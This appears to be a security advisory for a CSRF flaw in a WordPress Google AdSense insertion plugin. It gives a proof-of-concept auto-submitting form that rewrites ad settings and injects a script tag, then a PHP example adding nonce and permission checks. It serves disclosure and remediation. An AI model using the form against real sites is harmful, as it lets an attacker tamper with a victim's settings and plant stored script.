The plugin does not perform CSRF checks on updates to its admin page, allowing an attacker to trick a logged-in user into manipulating ads and injecting arbitrary JavaScript by submitting a form.
<form id="test" action="https://example.com/wp-admin/options-general.php?page=wordpress-plugin-for-simple-google-adsense-insertion/WP-Simple-Adsense-Insertion.php" method="POST">
<input type="text" name="info_update" value="true">
<input type="text" name="wp_ad_camp_1_code" value="hacked">
<input type="text" name="wp_ad_camp_2_code" value="<script>alert('boo!')</script>">
<input type="text" name="wp_ad_camp_3_code" value="">
<input type="text" name="wp_ad_camp_4_code" value="">
<input type="text" name="wp_ad_camp_5_code" value="">
<input type="text" name="wp_in_article_ad_code" value="">
<input type="text" name="wp_post_article_ad_code" value="hacked">
<input type="text" name="info_update" value="Update options">
</form>
<script>
document.getElementById("test").submit();
</script>
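The missing check, sketched as an added example that is not the plugin's own code: a settings handler that only accepts the update when the request carries a valid WordPress nonce and comes from a user allowed to manage options. The function and constant names are hypothetical, and storing each field under an option of the same name is an assumption; the field names are the ones in the form above.

```php
<?php
// Added example: hypothetical names, not taken from the plugin's source.
const EXAMPLE_AD_NONCE_ACTION = 'example_ad_settings_update';
const EXAMPLE_AD_NONCE_FIELD  = 'example_ad_settings_nonce';

// Field names as they appear in the form above.
function example_ad_fields() {
    return array(
        'wp_ad_camp_1_code',
        'wp_ad_camp_2_code',
        'wp_ad_camp_3_code',
        'wp_ad_camp_4_code',
        'wp_ad_camp_5_code',
        'wp_in_article_ad_code',
        'wp_post_article_ad_code',
    );
}

// Call inside the settings <form> so every legitimate submission carries
// a nonce bound to the logged-in user's session.
function example_ad_render_nonce() {
    wp_nonce_field( EXAMPLE_AD_NONCE_ACTION, EXAMPLE_AD_NONCE_FIELD );
}

// Call when the settings page is loaded, before anything is written.
function example_ad_handle_update() {
    if ( ! isset( $_POST['info_update'] ) ) {
        return; // Not a settings submission.
    }

    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }

    // Stops the request if the nonce is missing or invalid. A form hosted
    // on another origin cannot read the nonce, so it cannot pass this check.
    check_admin_referer( EXAMPLE_AD_NONCE_ACTION, EXAMPLE_AD_NONCE_FIELD );

    // Assumption: each field is stored under an option of the same name.
    // Values are stored as submitted; this example covers only the
    // request-origin check.
    foreach ( example_ad_fields() as $field ) {
        if ( isset( $_POST[ $field ] ) ) {
            update_option( $field, wp_unslash( $_POST[ $field ] ) );
        }
    }
}
```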